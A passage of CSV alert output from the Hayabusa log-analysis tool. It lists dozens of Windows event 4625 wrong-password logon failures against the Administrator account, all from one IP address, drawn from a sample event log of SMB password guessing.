01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: 
